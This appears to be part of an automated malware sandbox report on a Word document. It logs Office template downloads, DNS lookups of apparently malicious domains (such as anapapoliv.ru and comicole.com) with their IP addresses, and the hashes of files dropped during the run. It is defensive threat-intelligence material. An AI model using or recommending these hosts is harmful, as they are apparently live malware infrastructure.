2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cabtls, httpWINWORD.EXE10.9kB 290.5kB 184 215
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cabtls, httpWINWORD.EXE10.4kB 284.9kB 179 210
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cabtls, httpWINWORD.EXE10.2kB 274.6kB 182 203
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cabtls, httpWINWORD.EXE88.3kB 2.7MB 1531 1927
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cabtls, httpWINWORD.EXE19.7kB 573.5kB 342 418
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cabtls, httpWINWORD.EXE26.9kB 666.1kB 428 484
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cabtls, httpWINWORD.EXE7.2kB 235.2kB 118 175
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cabtls, httpWINWORD.EXE37.8kB 1.1MB 690 801
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cabtls, httpWINWORD.EXE2.5kB 49.6kB 27 43
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cabtls, httpWINWORD.EXE38.7kB 1.4MB 684 984
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cabtls, httpWINWORD.EXE89.9kB 2.6MB 1425 1884
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cabtls, httpWINWORD.EXE42.2kB 1.8MB 819 1319
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cabtls, httpWINWORD.EXE125.3kB 3.4MB 1980 2427
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cabtls, httpWINWORD.EXE17.7kB 988.9kB 367 717
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cabHTTP Response
200
-
73 B 247 B 1 1
DNS Request
roaming.officeapps.live.com
DNS Response
52.109.89.19
-
71 B 145 B 1 1
DNS Request
46.28.109.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
19.89.109.52.in-addr.arpa
-
69 B 131 B 1 1
DNS Request
18.24.18.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
138.32.126.40.in-addr.arpa
-
62 B 123 B 1 1
DNS Request
baza-shartash.ru
-
59 B 75 B 1 1
DNS Request
anapapoliv.ru
DNS Response
45.130.41.103
-
67 B 83 B 1 1
DNS Request
shorecrestschools.com
DNS Response
208.115.219.174
-
72 B 106 B 1 1
DNS Request
103.41.130.45.in-addr.arpa
-
58 B 74 B 1 1
DNS Request
comicole.com
DNS Response
37.153.95.99
-
65 B 81 B 1 1
DNS Request
elartedelaaccion.es
DNS Response
134.0.9.152
-
74 B 127 B 1 1
DNS Request
174.219.115.208.in-addr.arpa
-
71 B 105 B 1 1
DNS Request
99.95.153.37.in-addr.arpa
-
70 B 100 B 1 1
DNS Request
152.9.0.134.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
3.173.189.20.in-addr.arpa
-
79 B 231 B 1 1
DNS Request
metadata.templates.cdn.office.net
DNS Response
23.62.61.18423.62.61.162
-
79 B 202 B 1 1
DNS Request
binaries.templates.cdn.office.net
DNS Response
2.17.251.172.17.251.23
-
142 B 135 B 2 1
DNS Request
184.61.62.23.in-addr.arpa
DNS Request
184.61.62.23.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
17.251.17.2.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
23.236.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD541d9f8321bbd35aaf891f3b7bac060df
SHA158da7c06501159f4c7b909d59abc23152e8372ad
SHA25629457444b7268825b17399a00ce19fcd9ecd6647b936f229c8ca2bb35ea4ca64
SHA5125a23e2e3bd6713d0a66eb8ca74ac5ae878c549e20eb1d18423d7afa739d431685ebe0f66a8bf730c7b8188baaaedebe321294269de3e35e6b91bd07189803960
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82